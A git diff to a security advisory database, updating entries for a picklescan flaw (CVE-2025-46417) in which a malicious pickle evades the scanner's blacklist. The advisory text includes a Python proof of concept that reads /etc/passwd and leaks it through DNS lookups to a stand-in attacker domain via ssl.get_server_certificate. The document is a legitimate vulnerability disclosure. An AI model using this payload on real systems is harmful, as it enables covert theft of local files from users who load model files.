diff --git a/advisories/github-reviewed/2025/04/GHSA-4p4h-9gvq-7xfg/GHSA-4p4h-9gvq-7xfg.json b/advisories/github-reviewed/2025/04/GHSA-4p4h-9gvq-7xfg/GHSA-4p4h-9gvq-7xfg.json new file mode 100644 index 00000000000..0d6691ae19a --- /dev/null +++ b/advisories/github-reviewed/2025/04/GHSA-4p4h-9gvq-7xfg/GHSA-4p4h-9gvq-7xfg.json @@ -0,0 +1,60 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-4p4h-9gvq-7xfg", + "modified": "2025-04-24T16:02:09Z", + "published": "2025-04-24T03:31:32Z", + "withdrawn": "2025-04-24T16:02:09Z", + "aliases": [], + "summary": "Duplicate Advisory: Picklescan Vulnerable to Exfiltration via DNS via linecache and ssl.get_server_certificate", + "details": "# Duplicate Advisory\nThis advisory has been withdrawn because it is a duplicate of GHSA-93mv-x874-956g. This link is maintained to preserve external references.\n\n# Original Description\n\nThe unsafe globals in Picklescan before 0.0.25 do not include ssl. Consequently, ssl.get_server_certificate can exfiltrate data via DNS after deserialization.", + "severity": [ + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:P/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N" + } + ], + "affected": [ + { + "package": { + "ecosystem": "PyPI", + "name": "picklescan" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + } + ] + } + ], + "database_specific": { + "last_known_affected_version_range": "< 0.0.25" + } + } + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-46417" + }, + { + "type": "WEB", + "url": "https://github.com/mmaitre314/picklescan/pull/40" + }, + { + "type": "ADVISORY", + "url": "https://github.com/advisories/GHSA-93mv-x874-956g" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-184" + ], + "severity": "MODERATE", + "github_reviewed": true, + "github_reviewed_at": "2025-04-24T16:02:09Z", + "nvd_published_at": "2025-04-24T01:15:49Z" + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2025/04/GHSA-93mv-x874-956g/GHSA-93mv-x874-956g.json b/advisories/github-reviewed/2025/04/GHSA-93mv-x874-956g/GHSA-93mv-x874-956g.json index 4bd7d48bee4..55becd811bf 100644 --- a/advisories/github-reviewed/2025/04/GHSA-93mv-x874-956g/GHSA-93mv-x874-956g.json +++ b/advisories/github-reviewed/2025/04/GHSA-93mv-x874-956g/GHSA-93mv-x874-956g.json @@ -1,9 +1,11 @@ { "schema_version": "1.4.0", "id": "GHSA-93mv-x874-956g", - "modified": "2025-04-07T18:52:48Z", + "modified": "2025-04-24T16:02:36Z", "published": "2025-04-07T18:52:47Z", - "aliases": [], + "aliases": [ + "CVE-2025-46417" + ], "summary": "Picklescan Vulnerable to Exfiltration via DNS via linecache and ssl.get_server_certificate", "details": "### Summary\n\nPicklescan does not detect malicious pickles that exfiltrate sensitive information via DNS after deserialization.\n\n\n### Details\n\npicklescan’s blacklist can be bypassed to exfiltrate sensitive information (like file contents, secrets, or credentials) during model deserialization by leveraging `ssl.get_server_certificate` as the callable function in the pickle payload. Since `ssl` is a standard Python library used for legitimate TLS operations, it is rarely blacklisted by static scanners or runtime monitors.\n\nThe payload avoids flagged modules and instead uses `linecache` (also unflagged) to read local files. The exfiltrated data is added to DNS-safe chunks, and embedded as subdomains in a crafted FQDN. When passed to `ssl.get_server_certificate`, the Python runtime performs a DNS resolution to the attacker-controlled domain, leaking the encoded content.\n\nThe payload executes the following steps:\n\n- Reads sensitive local file content using `linecache` module\n- Encodes the data for DNS exfiltration\n- Constructs a malicious domain name using a third party service `dnslog.cn` \n- Triggers a DNS resolution via `ssl.get_server_certificate`\n- Leaks the encoded file content to the attacker\n\n### PoC\n\nBefore running the PoC change the `fqdn` to your own or a third party that you control. In this PoC we used ` fqdn = f\"{subdomain}.ctmc2q.dnslog.cn\"`.\n\n```python\n\nimport numpy as np\n\ndef create_malicious_model():\n# Define the payload class\n class DNSLogPayload:\n def __reduce__(self):\n # Step 1: read a line from /etc/passwd\n linecache = __import__(\"linecache\")\n first_line = linecache.getline(\"/etc/passwd\", 1).strip()\n\n # Step 2: Sanitize and embed it as a DNS subdomain\n subdomain = first_line.replace(\":\", \"_\").replace(\"/\", \"_\")\n fqdn = f\"{subdomain}.dns-logger.invalid\"\n\n # Step 3: Use ssl.get_server_certificate to trigger DNS resolution\n ssl_mod = __import__(\"ssl\")\n return (getattr(ssl_mod, \"get_server_certificate\"), ((fqdn, 443),))\n\n # Wrap the payload in a NumPy object array\n arr = np.array([DNSLogPayload()], dtype=object)\n\n # Save to .npy file\n np.save(\"dnslog_trigger_payload.npy\", arr, allow_pickle=True) \n\ndef load_model(model):\n try:\n return np.load(model, encoding=\"latin1\", fix_imports=True, allow_pickle=1)\n except Exception:\n raise ValueError(\"Invalid file\")\n\nif __name__ == \"__main__\":\n create_malicious_model()\n model = \"dnslog_trigger_payload.npy\"\n print(\"[i] Loading and executing the model\")\n data = load_model(model)\n \n```\n\n### Impact\n\n1. Evade detection: Bypasses the latest version of picklescan's blacklist. \n2. Exfiltrate sensitive local files to an attacker controlled DNS", "severity": [ @@ -38,6 +40,10 @@ "type": "WEB", "url": "https://github.com/mmaitre314/picklescan/security/advisories/GHSA-93mv-x874-956g" }, + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-46417" + }, { "type": "WEB", "url": "https://github.com/mmaitre314/picklescan/pull/40" @@ -45,6 +51,10 @@ { "type": "PACKAGE", "url": "https://github.com/mmaitre314/picklescan" + }, + { + "type": "WEB", + "url": "https://github.com/pypa/advisory-database/tree/main/vulns/picklescan/PYSEC-2025-34.yaml" } ], "database_specific": { diff --git a/advisories/unreviewed/2025/04/GHSA-4p4h-9gvq-7xfg/GHSA-4p4h-9gvq-7xfg.json b/advisories/unreviewed/2025/04/GHSA-4p4h-9gvq-7xfg/GHSA-4p4h-9gvq-7xfg.json deleted file mode 100644 index 3e049ac3ff8..00000000000 --- a/advisories/unreviewed/2025/04/GHSA-4p4h-9gvq-7xfg/GHSA-4p4h-9gvq-7xfg.json +++ /dev/null @@ -1,40 +0,0 @@ -{ - "schema_version": "1.4.0", - "id": "GHSA-4p4h-9gvq-7xfg", - "modified": "2025-04-24T03:31:32Z", - "published": "2025-04-24T03:31:32Z", - "aliases": [ - "CVE-2025-46417" - ], - "details": "The unsafe globals in Picklescan before 0.0.25 do not include ssl. Consequently, ssl.get_server_certificate can exfiltrate data via DNS after deserialization.", - "severity": [ - { - "type": "CVSS_V4", - "score": "CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:P/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" - } - ], - "affected": [], - "references": [ - { - "type": "ADVISORY", - "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-46417" - }, - { - "type": "WEB", - "url": "https://github.com/mmaitre314/picklescan/pull/40" - }, - { - "type": "ADVISORY", - "url": "https://github.com/advisories/GHSA-93mv-x874-956g" - } - ], - "database_specific": { - "cwe_ids": [ - "CWE-184" - ], - "severity": "MODERATE", - "github_reviewed": false, - "github_reviewed_at": null, - "nvd_published_at": "2025-04-24T01:15:49Z" - } -} \ No newline at end of file